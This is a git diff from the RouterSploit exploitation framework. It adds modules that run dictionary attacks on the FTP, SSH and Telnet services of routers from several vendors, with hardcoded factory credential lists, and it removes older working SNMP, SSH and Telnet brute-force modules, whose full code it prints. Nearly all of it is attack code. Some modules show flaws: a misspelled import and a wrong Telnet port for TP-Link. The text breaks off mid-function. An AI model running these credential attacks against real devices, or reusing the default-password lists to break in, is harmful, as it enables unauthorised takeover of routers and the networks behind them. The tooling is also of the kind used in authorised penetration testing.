000000000..7e112838c --- /dev/null +++ b/routersploit/modules/creds/routers/technicolor/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Technicolor Router Default SSH Creds", + "description": "Module performs dictionary attack against Technicolor Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Technicolor Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:password,admin:1234,Administrator:", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/technicolor/telnet_default_creds.py b/routersploit/modules/creds/routers/technicolor/telnet_default_creds.py new file mode 100644 index 000000000..7e858fc76 --- /dev/null +++ b/routersploit/modules/creds/routers/technicolor/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Technicolor Router Default Telnet Creds", + "description": "Module performs dictionary attack against Technicolor Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Technicolor Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:password,admin:1234,Administrator:", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/thomson/__init__.py b/routersploit/modules/creds/routers/thomson/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/thomson/ftp_default_creds.py b/routersploit/modules/creds/routers/thomson/ftp_default_creds.py new file mode 100644 index 000000000..fe8dbacfd --- /dev/null +++ b/routersploit/modules/creds/routers/thomson/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Thomson Router Default FTP Creds", + "description": "Module performs dictionary attack against Thomson Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Thomson Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:password", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/thomson/ssh_default_creds.py b/routersploit/modules/creds/routers/thomson/ssh_default_creds.py new file mode 100644 index 000000000..b4b7d36dc --- /dev/null +++ b/routersploit/modules/creds/routers/thomson/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Thomson Router Default SSH Creds", + "description": "Module performs dictionary attack against Thomson Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Thomson Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:password", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/thomson/telnet_default_creds.py b/routersploit/modules/creds/routers/thomson/telnet_default_creds.py new file mode 100644 index 000000000..a4043a83b --- /dev/null +++ b/routersploit/modules/creds/routers/thomson/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Thomson Router Default Telnet Creds", + "description": "Module performs dictionary attack against Thomson Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Thomson Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:password", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/tplink/__init__.py b/routersploit/modules/creds/routers/tplink/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/tplink/ftp_default_creds.py b/routersploit/modules/creds/routers/tplink/ftp_default_creds.py new file mode 100644 index 000000000..29cf0ee64 --- /dev/null +++ b/routersploit/modules/creds/routers/tplink/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routerpsloit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "TP-Link Router Default FTP Creds", + "description": "Module performs dictionary attack against TP-Link Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "TP-Link Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/tplink/ssh_default_creds.py b/routersploit/modules/creds/routers/tplink/ssh_default_creds.py new file mode 100644 index 000000000..9f6c92019 --- /dev/null +++ b/routersploit/modules/creds/routers/tplink/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routerpsloit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "TP-Link Router Default SSH Creds", + "description": "Module performs dictionary attack against TP-Link Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "TP-Link Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/tplink/telnet_default_creds.py b/routersploit/modules/creds/routers/tplink/telnet_default_creds.py new file mode 100644 index 000000000..64acbcc87 --- /dev/null +++ b/routersploit/modules/creds/routers/tplink/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routerpsloit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "TP-Link Router Default Telnet Creds", + "description": "Module performs dictionary attack against TP-Link Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "TP-Link Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/ubiquiti/__init__.py b/routersploit/modules/creds/routers/ubiquiti/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/ubiquiti/ftp_default_creds.py b/routersploit/modules/creds/routers/ubiquiti/ftp_default_creds.py new file mode 100644 index 000000000..2028eff83 --- /dev/null +++ b/routersploit/modules/creds/routers/ubiquiti/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Ubiquiti Router Default FTP Creds", + "description": "Module performs dictionary attack against Ubiquiti Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Ubiquiti Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,root:ubnt,ubnt:ubnt", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/ubiquiti/ssh_default_creds.py b/routersploit/modules/creds/routers/ubiquiti/ssh_default_creds.py new file mode 100644 index 000000000..cd2b0f7ed --- /dev/null +++ b/routersploit/modules/creds/routers/ubiquiti/ssh_default_creds.py @@ -0,0 +1,23 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Ubiquiti Router Default SSH Creds", + "description": "Module performs dictionary attack against Ubiquiti Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Ubiquiti Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,root:ubnt,ubnt:ubnt", "User:Pass or file with default credentials (file://)") + diff --git a/routersploit/modules/creds/routers/ubiquiti/telnet_default_creds.py b/routersploit/modules/creds/routers/ubiquiti/telnet_default_creds.py new file mode 100644 index 000000000..1230e00af --- /dev/null +++ b/routersploit/modules/creds/routers/ubiquiti/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Ubiquiti Router Default Telnet Creds", + "description": "Module performs dictionary attack against Ubiquiti Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Ubiquiti Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,root:ubnt,ubnt:ubnt", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/zte/__init__.py b/routersploit/modules/creds/routers/zte/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/zte/ftp_default_creds.py b/routersploit/modules/creds/routers/zte/ftp_default_creds.py new file mode 100644 index 000000000..fc2694183 --- /dev/null +++ b/routersploit/modules/creds/routers/zte/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "ZTE Router Default FTP Creds", + "description": "Module performs dictioanry attack against ZTE Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "ZTE Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,ZXDSL:ZXDSL,user:user,on:on,root:Zte521,root:W!n0&oO7.", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/zte/ssh_default_creds.py b/routersploit/modules/creds/routers/zte/ssh_default_creds.py new file mode 100644 index 000000000..361a0d520 --- /dev/null +++ b/routersploit/modules/creds/routers/zte/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "ZTE Router Default SSH Creds", + "description": "Module performs dictionary attack against ZTE Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "ZTE Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,ZXDSL:ZXDSL,user:user,on:on,root:Zte521,root:W!n0&oO7.", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/zte/telnet_default_creds.py b/routersploit/modules/creds/routers/zte/telnet_default_creds.py new file mode 100644 index 000000000..8a3ed5ee9 --- /dev/null +++ b/routersploit/modules/creds/routers/zte/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "ZTE Router Default Telnet Creds", + "description": "Module performs dictionary attack against ZTE Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "ZTE Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,ZXDSL:ZXDSL,user:user,on:on,root:Zte521,root:W!n0&oO7.", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/zyxel/__init__.py b/routersploit/modules/creds/routers/zyxel/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/zyxel/ftp_default_creds.py b/routersploit/modules/creds/routers/zyxel/ftp_default_creds.py new file mode 100644 index 000000000..a56ff8972 --- /dev/null +++ b/routersploit/modules/creds/routers/zyxel/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Zyxel Router Default FTP Creds", + "description": "Module performs dictionary attack against Zyxel Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Zyxel Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:1234,admin:user", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/zyxel/ssh_default_creds.py b/routersploit/modules/creds/routers/zyxel/ssh_default_creds.py new file mode 100644 index 000000000..cefc9c229 --- /dev/null +++ b/routersploit/modules/creds/routers/zyxel/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Zyxel Router Default SSH Creds", + "description": "Module performs dictionary attack against Zyxel Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Zyxel Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:1234,admin:user", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/zyxel/telnet_default_creds.py b/routersploit/modules/creds/routers/zyxel/telnet_default_creds.py new file mode 100644 index 000000000..f2c2319bd --- /dev/null +++ b/routersploit/modules/creds/routers/zyxel/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Zyxel Router Default Telnet Creds", + "description": "Module performs dictionary attack against Zyxel Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Zyxel Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:1234,admin:user", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/snmp_bruteforce.py b/routersploit/modules/creds/snmp_bruteforce.py deleted file mode 100644 index 5115d4ca0..000000000 --- a/routersploit/modules/creds/snmp_bruteforce.py +++ /dev/null @@ -1,98 +0,0 @@ -import threading -from pysnmp.entity.rfc3413.oneliner import cmdgen - -from routersploit import ( - exploits, - wordlists, - print_status, - print_error, - LockedIterator, - print_success, - print_table, - boolify, - multi, -) - - -class Exploit(exploits.Exploit): - """ - Module performs bruteforce attack against SNMP service. - If valid community string is found, it is displayed to the user. - """ - __info__ = { - 'name': 'SNMP Bruteforce', - 'description': 'Module performs bruteforce attack against SNMP service. ' - 'If valid community string is found, it is displayed to the user.', - 'authors': [ - 'Marcin Bury ', # routersploit module - ], - 'references': [ - '', - ], - 'devices': [ - 'Multi', - ], - } - - target = exploits.Option('', 'Target IP address or file with target:port (file://)') - port = exploits.Option(161, 'Target port') - version = exploits.Option(1, 'Snmp version 0:v1, 1:v2c') - threads = exploits.Option(8, 'Number of threads') - snmp = exploits.Option(wordlists.snmp, 'Community string or file with community strings (file://)') - verbosity = exploits.Option('yes', 'Display authentication attempts') - stop_on_success = exploits.Option('yes', 'Stop on first valid community string') - strings = [] - - def run(self): - self.strings = [] - self.attack() - - @multi - def attack(self): - - # todo: check if service is up - - if self.snmp.startswith('file://'): - snmp = open(self.snmp[7:], 'r') - else: - snmp = [self.snmp] - - collection = LockedIterator(snmp) - self.run_threads(self.threads, self.target_function, collection) - - if len(self.strings): - print_success("Credentials found!") - headers = ("Target", "Port", "Community Strings") - print_table(headers, *self.strings) - else: - print_error("Valid community strings not found") - - def target_function(self, running, data): - module_verbosity = boolify(self.verbosity) - name = threading.current_thread().name - - print_status(name, 'thread is starting...', verbose=module_verbosity) - - cmdGen = cmdgen.CommandGenerator() - while running.is_set(): - try: - string = data.next().strip() - - errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd( - cmdgen.CommunityData(string, mpModel=int(self.version)), - cmdgen.UdpTransportTarget((self.target, int(self.port))), - '1.3.6.1.2.1.1.1.0', - ) - - if errorIndication or errorStatus: - print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) - else: - if boolify(self.stop_on_success): - running.clear() - print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) - self.strings.append((self.target, self.port, string)) - - except StopIteration: - break - - print_status(name, 'thread is terminated.', verbose=module_verbosity) diff --git a/routersploit/modules/creds/ssh_bruteforce.py b/routersploit/modules/creds/ssh_bruteforce.py deleted file mode 100644 index 6d9e1c171..000000000 --- a/routersploit/modules/creds/ssh_bruteforce.py +++ /dev/null @@ -1,115 +0,0 @@ -import threading -import itertools -import socket -import paramiko - -from routersploit import ( - exploits, - wordlists, - print_status, - print_error, - LockedIterator, - print_success, - print_table, - boolify, - multi, -) - - -class Exploit(exploits.Exploit): - """ - Module performs bruteforce attack against SSH service. - If valid credentials are found, they are displayed to the user. - """ - __info__ = { - 'name': 'SSH Bruteforce', - 'description': 'Module performs bruteforce attack against SSH service. ' - 'If valid credentials are found, they are displayed to the user.', - 'authors': [ - 'Marcin Bury ', # routersploit module - ], - 'references': [ - '', - ], - 'devices': [ - 'Multi', - ], - } - - target = exploits.Option('', 'Target IP address or file with target:port (file://)') - port = exploits.Option(22, 'Target port') - - threads = exploits.Option(8, 'Number of threads') - usernames = exploits.Option('admin', 'Username or file with usernames (file://)') - passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)') - verbosity = exploits.Option('yes', 'Display authentication attempts') - stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt') - - credentials = [] - - def run(self): - self.credentials = [] - self.attack() - - @multi - def attack(self): - ssh = paramiko.SSHClient() - - try: - ssh.connect(self.target, port=self.port) - except socket.error: - print_error("Connection error: %s:%s" % (self.target, str(self.port))) - ssh.close() - return - except Exception: - pass - - ssh.close() - - if self.usernames.startswith('file://'): - usernames = open(self.usernames[7:], 'r') - else: - usernames = [self.usernames] - - if self.passwords.startswith('file://'): - passwords = open(self.passwords[7:], 'r') - else: - passwords = [self.passwords] - - collection = LockedIterator(itertools.product(usernames, passwords)) - self.run_threads(self.threads, self.target_function, collection) - - if len(self.credentials): - print_success("Credentials found!") - headers = ("Target", "Port", "Login", "Password") - print_table(headers, *self.credentials) - else: - print_error("Credentials not found") - - def target_function(self, running, data): - module_verbosity = boolify(self.verbosity) - name = threading.current_thread().name - ssh = paramiko.SSHClient() - ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) - - print_status(name, 'thread is starting...', verbose=module_verbosity) - - while running.is_set(): - try: - user, password = data.next() - user = user.strip() - password = password.strip() - ssh.connect(self.target, int(self.port), timeout=5, username=user, password=password) - except StopIteration: - break - except paramiko.ssh_exception.SSHException as err: - ssh.close() - print_error("Target: {}:{} {}: {} Username: '{}' Password: '{}'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity) - else: - if boolify(self.stop_on_success): - running.clear() - - print_success("Target: {}:{} {} Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) - self.credentials.append((self.target, self.port, user, password)) - - print_status(name, 'thread is terminated.', verbose=module_verbosity) diff --git a/routersploit/modules/creds/ssh_default.py b/routersploit/modules/creds/ssh_default.py deleted file mode 100644 index 14e7c1788..000000000 --- a/routersploit/modules/creds/ssh_default.py +++ /dev/null @@ -1,108 +0,0 @@ -import threading -import paramiko -import socket - -from routersploit import ( - exploits, - wordlists, - print_status, - print_error, - LockedIterator, - print_success, - print_table, - boolify, - multi, -) - - -class Exploit(exploits.Exploit): - """ - Module perform dictionary attack with default credentials against SSH service. - If valid credentials are found, they are displayed to the user. - """ - __info__ = { - 'name': 'SSH Default Creds', - 'description': 'Module perform dictionary attack with default credentials against SSH service. ' - 'If valid credentials are found, they are displayed to the user.', - 'authors': [ - 'Marcin Bury ' # routersploit module - ], - 'references': [ - '', - ], - 'devices': [ - 'Multi', - ], - } - - target = exploits.Option('', 'Target IP address or file with target:port (file://)') - port = exploits.Option(22, 'Target port') - threads = exploits.Option(8, 'Numbers of threads') - defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)') - verbosity = exploits.Option('yes', 'Display authentication attempts') - stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt') - - credentials = [] - - def run(self): - self.credentials = [] - self.attack() - - @multi - def attack(self): - ssh = paramiko.SSHClient() - - try: - ssh.connect(self.target, port=self.port) - except socket.error: - print_error("Connection error: %s:%s" % (self.target, str(self.port))) - ssh.close() - return - except Exception: - pass - - ssh.close() - - if self.defaults.startswith('file://'): - defaults = open(self.defaults[7:], 'r') - else: - defaults = [self.defaults] - - collection = LockedIterator(defaults) - self.run_threads(self.threads, self.target_function, collection) - - if len(self.credentials): - print_success("Credentials found!") - headers = ("Target", "Port", "Login", "Password") - print_table(headers, *self.credentials) - else: - print_error("Credentials not found") - - def target_function(self, running, data): - module_verbosity = boolify(self.verbosity) - name = threading.current_thread().name - ssh = paramiko.SSHClient() - ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) - - print_status(name, 'process is starting...', verbose=module_verbosity) - - while running.is_set(): - try: - line = data.next().split(":") - user = line[0].strip() - password = line[1].strip() - ssh.connect(self.target, int(self.port), timeout=5, username=user, password=password) - except StopIteration: - break - except paramiko.ssh_exception.SSHException as err: - ssh.close() - - print_error("Target: {}:{} {}: {} Username: '{}' Password: '{}'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity) - else: - if boolify(self.stop_on_success): - running.clear() - - print_success("Target: {}:{} {} Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) - self.credentials.append((self.target, self.port, user, password)) - - print_status(name, 'process is terminated.', verbose=module_verbosity) diff --git a/routersploit/modules/creds/telnet_bruteforce.py b/routersploit/modules/creds/telnet_bruteforce.py deleted file mode 100644 index 9ba767cae..000000000 --- a/routersploit/modules/creds/telnet_bruteforce.py +++ /dev/null @@ -1,130 +0,0 @@ -import threading -import itertools -import telnetlib - -from routersploit import ( - exploits, - wordlists, - print_status, - print_error, - LockedIterator, - print_success, - print_table, - boolify, - multi, -) - - -class Exploit(exploits.Exploit): - """ - Module performs bruteforce attack against Telnet service. - If valid credentials are found, they are displayed to the user. - """ - __info__ = { - 'name': 'Telnet Bruteforce', - 'description': 'Module performs bruteforce attack against Telnet service. ' - 'If valid credentials are found, they are displayed to the user.', - 'authors': [ - 'Marcin Bury ', # routersploit module - ], - 'references': [ - '', - ], - 'devices': [ - 'Multi', - ], - } - - target = exploits.Option('', 'Target IP address or file with target:port (file://)') - port = exploits.Option(23, 'Target port') - - threads = exploits.Option(8, 'Number of threads') - usernames = exploits.Option('admin', 'Username or file with usernames (file://)') - passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)') - verbosity = exploits.Option('yes', 'Display authentication attempts') - stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt') - - credentials = [] - - def run(self): - self.credentials = [] - self.attack() - - @multi - def attack(self): - try: - tn = telnetlib.Telnet(self.target, self.port, timeout=10) - tn.expect(["login: ", "Login: "], 5) - tn.close() - except Exception: - print_error("Connection error {}:{}".format(self.target, self.port)) - return - - if self.usernames.startswith('file://'): - usernames = open(self.usernames[7:], 'r') - else: - usernames = [self.usernames] - - if self.passwords.startswith('file://'): - passwords = open(self.passwords[7:], 'r') - else: - passwords = [self.passwords] - - collection = LockedIterator(itertools.product(usernames, passwords)) - self.run_threads(self.threads, self.target_function, collection) - - if len(self.credentials): - print_success("Credentials found!") - headers = ("Target", "Port", "Login", "Password") - print_table(headers, *self.credentials) - else: - print_error("Credentials not found") - - def target_function(self, running, data): - module_verbosity = boolify(self.verbosity) - name = threading.current_thread().name - - print_status(name, 'thread is starting...', verbose=module_verbosity) - - while running.is_set(): - try: - user, password = data.next() - user = user.strip() - password = password.strip() - except StopIteration: - break - else: - retries = 0 - while retries < 3: - try: - tn = telnetlib.Telnet(self.target, self.port, timeout=10) - tn.expect(["Login: ", "login: "], 5) - tn.write(user + "\r\n") - tn.expect(["Password: ", "password"], 5) - tn.write(password + "\r\n") - tn.write("\r\n") - - (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) - tn.close() - - if i != -1: - print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) - else: - if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500: # big banner e.g. mikrotik - if boolify(self.stop_on_success): - running.clear() - - print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) - self.credentials.append((self.target, self.port, user, password)) - tn.close() - break - except EOFError: - print_error(name, "Connection problem. Retrying...", verbose=module_verbosity) - retries += 1 - - if retries > 2: - print_error("Too much connection problems. Quiting...", verbose=module_verbosity) - return - continue - - print_status(name, 'thread is terminated.', verbose=module_verbosity) diff --git a/routersploit/modules/creds/telnet_default.py b/routersploit/modules/creds/telnet_default.py deleted file mode 100644 index 3296d32bc..000000000 --- a/routersploit/modules/creds/telnet_default.py +++ /dev/null @@ -1,122 +0,0 @@ -import threading -import telnetlib - -from routersploit import ( - exploits, - wordlists, - print_status, - print_error, - LockedIterator, - print_success, - print_table, - boolify, - multi, -) - - -class Exploit(exploits.Exploit): - """ - Module perform dictionary attack with default credentials against Telnet service. - If valid credentials are found, they are displayed to the user. - """ - __info__ = { - 'name': 'Telnet Default Creds', - 'description': 'Module perform dictionary attack with default credentials against Telnet service. ' - 'If valid credentials are found, they are displayed to the user.', - 'authors': [ - 'Marcin Bury ' # routersploit module - ], - 'references': [ - '', - ], - 'devices': [ - 'Multi', - ], - } - - target = exploits.Option('', 'Target IP address or file with target:port (file://)') - port = exploits.Option(23, 'Target port') - - threads = exploits.Option(8, 'Numbers of threads') - defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)') - verbosity = exploits.Option('yes', 'Display authentication attempts') - stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt') - - credentials = [] - - def run(self): - self.credentials = [] - self.attack() - - @multi - def attack(self): - try: - tn = telnetlib.Telnet(self.target, self.port, timeout=10) - tn.expect(["login: ", "Login: "], 5) - tn.close() - except Exception: - print_error("Connection error {}:{}".format(self.target, self.port)) - return - - if self.defaults.startswith('file://'): - defaults = open(self.defaults[7:], 'r') - else: - defaults = [self.defaults] - - collection = LockedIterator(defaults) - self.run_threads(self.threads, self.target_function, collection) - - if len(self.credentials): - print_success("Credentials found!") - headers = ("Target", "Port", "Login", "Password") - print_table(headers, *self.credentials) - else: - print_error("Credentials not found") - - def target_function(self, running, data): - module_verbosity = boolify(self.verbosity) - name = threading.current_thread().name - print_status(name, 'process is starting...', verbose=module_verbosity) - - while running.is_set(): - try: - line = data.next().split(":") - user = line[0].strip() - password = line[1].strip() - except StopIteration: - break - else: - retries = 0 - while retries < 3: - try: - tn = telnetlib.Telnet(self.target, self.port, timeout=10) - tn.expect(["Login: ", "login: "], 5) - tn.write(user + "\r\n") - tn.expect(["Password: ", "password"], 5) - tn.write(password + "\r\n") - tn.write("\r\n") - - (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) - tn.close() - - if i != -1: - print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) - else: - if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500: # big banner e.g. mikrotik - if boolify(self.stop_on_success): - 